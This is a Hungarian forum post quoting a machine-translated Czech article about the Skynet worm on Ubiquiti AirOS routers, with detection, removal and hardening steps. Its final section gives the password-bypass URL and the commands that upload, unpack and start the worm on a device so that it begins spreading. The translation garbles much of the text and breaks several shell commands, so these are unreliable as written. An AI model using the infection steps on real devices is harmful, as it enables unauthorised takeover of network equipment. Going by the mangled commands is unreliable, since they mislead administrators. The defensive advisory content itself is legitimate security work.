Ubiquiti sebezhetőség - Skynet vírus

Sziasztok!

A minap kaptam egy levelet, melyben a csehek írnak egy nagyon veszélyes sebezhetőségről, amely szinte minden Ubiquiti eszközt érint. A sebezhetőséggel jelszó nélkül teljes hozzáférést kaphatunk az eszközhöz, sőt egy vírus is kihasználja, amely egy sniffert telepít az antennára. Az Ubiquiti fórumon több témát nyitottak számára, de mindet törlik, hogy ne szivárogjon ki a nyilvánosság elé, állítólag már dolgoznak rajta.

http://www.root.cz/clanky/virus-v-bezdratovych-routerech-skynet/

Google fordító segítségével lefordítva:

Szerencsére a vírus nem terjedt teljesen az összes vezeték nélküli router, nem annyira "tökéletes" nem, és az életem kell a következőket:

Berendezés Ubiquity (NanoStation, locostation, stb)
AirOS firmware verzió 3.6.1, 4.x és 5.x, beleértve a jelenlegi változatban - firmware használja GNU / Linux
További követelmény, hogy egy webes felületen futó 80-as porton
A fenti eszközök igen népszerű a helyi internet szolgáltatók, így a vírus érintett vagy hatással lesz nagyon sok ember.

Mi okozza a vírus?

Azt sikerült megszereznie néhány változtatást, de mindegyiknek közös:

nyilván saját reprodukciós
csapdába a login cookie az eszköz és a kommunikáció a vírus szerzője
hallgat a hálózati forgalmat és azonosító szlogenek 80-as porton, és a kommunikáció a szerző a vírus
Többek között a vírus véletlenszerűen újraindul a készülék, talán a kimerülése szabad memória, de egy módosított és célzott WiFi router újraindul.

Hogyan működik a vírus?

Azt kell mondani, hogy a féreg használ kombinációja hiba alkotók firmware a készülékhez. Az első hiba az, hogy ezek a verziók a firmware az eszköz létezik oldal /admin.cgi , ami természetesen jelszóval védett a készülék beállítása, de lehetővé teszi a fájlok feltöltése az eszközök vagy arcátlan parancs végrehajtását root keresztül webes felületen. Ez az oldal a gyártó firmware-én határozottan indított. A második hiba a rossz meg a saját konfigurációs AirOS modul lighttpd web szerver, amely lehetővé teszi a belépő néhány karakter után megjelenő URL bármely webhely konfiguráció ismerete nélkül a jelszót.

Az a néhány karakter megtalálható a csatolt fájl vírussal skynet.tgz , és szándékosan nem kerülnek közvetlenül a cikk.

E két hiba van a lehetősége a vírus könnyen terjed anélkül, hogy elszakadna bonyolult jelszavak, stb, lényegében egy teszt IP-cím egy pár másodpercig, és megpróbálja ciklus egyre több és több.

Honnan tudom, hogy én vagyok a fertőzött eszközök

próbálja jelentkezzen be a készüléket, és tekintse http://ip.ad.re.sa/admin.cgi - ha az oldal nem létezik, ott van Skynet, kellett lap átnevezi adm.cgi .

Jelentkezzen be az eszközt ssh-n keresztül, és győződjön meg arról, a könyvtár /etc/persistent rejtett könyvtárba .skynet .

ssh ubnt@ip.ad.re.sa
ls-la / etc / persistent
Ön is ellenőrizheti segítségével ssh parancs ps , ha fut nc, tcpdump és grep, és ha igen, akkor a fertőzött készülék.

Hogyan lehet eltávolítani a vírust?

A vírus eltávolítható belép az eszköz ssh-n keresztül, és írja be a következő parancsokat.

# UBNT helyett meg kell adnia a felhasználói nevét
ssh ubnt@ip.ad.re.sa
cd / etc / persistent
rm rc.poststart
rm-rf. Skynet
# Írjuk be a konfigurációs eltávolítása után
cfgmtd-w-p / etc /
újraindítás
Eltávolítása a vírus nem akadályozza meg más lehetséges fertőzést. A vírus is lehet távolítani a site /admin.cgi a készüléket, és belép a fenti parancsot, de ugyanakkor - ez elválasztani, mert törlése után a könyvtár már nem Skynet Web szerver (újraindítás).

cd / etc / persistent, rc.poststart rm, rm-rf. Skynet; cfgmtd-w-p / etc /; újraindítása
Mennyire biztonságos helyen?

Ez egy kicsit bonyolultabb, ha firmware verziója 3.6.1 vagy 4.0, használja változata 3,6, amely felhasználja a boa webszerver, és ezért nem szenvednek fogyatékosságok számát a 2. és a Skynet nem fog bele a készülékbe. Downgrade, de nem távolítja el a vírust a készülékről.

Az első fázisban a mozgás egy másik web szerver port - kapsz egy kis időt. Majd eldönti, hogy módosítsa a firmware saját képét - letölthető az SDK a gyártó honlapján, és énekelni dicséretét a GPL, vagy legalábbis biztonságos webes felületen úgy, hogy nem működik az oldalon admin.cgi , mert nem a tömörített firmware eszközt eltávolították.

Egyszerű javítás történik a következő, ssh, hogy jelentkezzen be a készüléket, és adja meg a parancsokat:

echo "echo 'airos.deny + = (\" / admin.cgi / gif \ ")'>> / etc / lighttpd.conf'> / etc / persistent / rc.poststart "
echo "kill -9` ps | grep "lighttpd-D" | cut-d''-f 3 ''>> / etc / persistent / rc.poststart
chmod + x / etc / persistent / rc.poststart
cfgmtd-w-p / etc /
újraindítás
Ez írja a fájlt kell futtatni induló, tulajdonítható, hogy a webszerver konfigurációs direktíva, amely megakadályozza a kijelző oldalra, hogy kihasználja Skynet, majd a végén, hogy a webszerver már fut. Újraindítani a webszervert automatikusan.

Ezek a lépések nem teljes, és azt javasoljuk, hogy módosítsa a konfigurációs fájlt /usr/etc/lighttpd/lighttpd.conf , és a sorrend, és airos.allow airos.deny a következő:

airos.deny = (. "inc", "~". "tmpl")
airos.allow = ("/ login.cgi", "/ ticket.cgi")
airos.allow + = ("/ style.css", "/ images / bg.png", "/ images / ulogo.skv.gif")
airos.allow + = ("/ login.css")
airos.deny + = (". cgi / login.cgi", ". cgi / ticket.cgi")
airos.deny + = (". cgi / style.css", ". cgi / images / bg.png", ". cgi / images / ulogo.skv.gif")
airos.deny + = (". cgi / login.css")
Vagy közvetlenül szerkeszteni AirOS modul írni C, de ez már meghaladja az erőmet. Még nem tudtam lefordítani a firmware-t a gyártó, amely támogatja a reguláris kifejezések lighttpd konfiguráció, amely szintén könnyebb írni golyóálló web szerver konfiguráció.

Ha össze a saját firmware, azt ajánlom, menjen el a sorozat 5.xz SDK 5.3.3 fix lighttpd konfigurációt, és győződjön meg róla, hogy cserélje ki a fájl admin.cgi üres fájlt. A normál használat a berendezés nem szükséges.

A tömeges megoldás?

Ha több eszközt, szerkeszteni kézzel, de ha több száz alkalmazott, akkor azt javaslom, hogy hozzon létre egy egyedi firmware, és töltse a készüléket vagy UBNT AIRCONTROL Center vagy szkriptek http://dren.dk/ubi.html , de kell egy kicsit přiohnout.

A tényleges vírus kísérletek

Ha szeretne kísérletezni, letöltheti vírus ( skynet.tgz ). Itt van, hogyan lehet őt a készülék (és aktiválja) ismerete nélkül a jelszót. Kísérlet saját felelősségére!

A megjelenítő eszköz UBNT http://ip.ad.re.sa/admin.cgi/.gif
fájl feltöltése skynet.tgz
mv /tmp/upload/skynet.tgz /etc/persistent/
cd /etc/persistent/ ; tar -xvzf /etc/persistent/skynet.tgz
/etc/persistent/.skynet/install
A készülék ezután újraindul, és a vírus elkezd terjedni.
Következtetés

A gyártó a hiba már tájékoztatta két héttel ezelőtt, de még nem válaszolt a hirdetményben vagy fellebbezést nem firmware (korrigált AirOS modul lighttpd). Szerencsére, köszönhetően a GPL licensz már hozzáférhetnek a forráskódhoz, így tudunk építeni egy saját firmware a múlt, ami nem szenved hiba.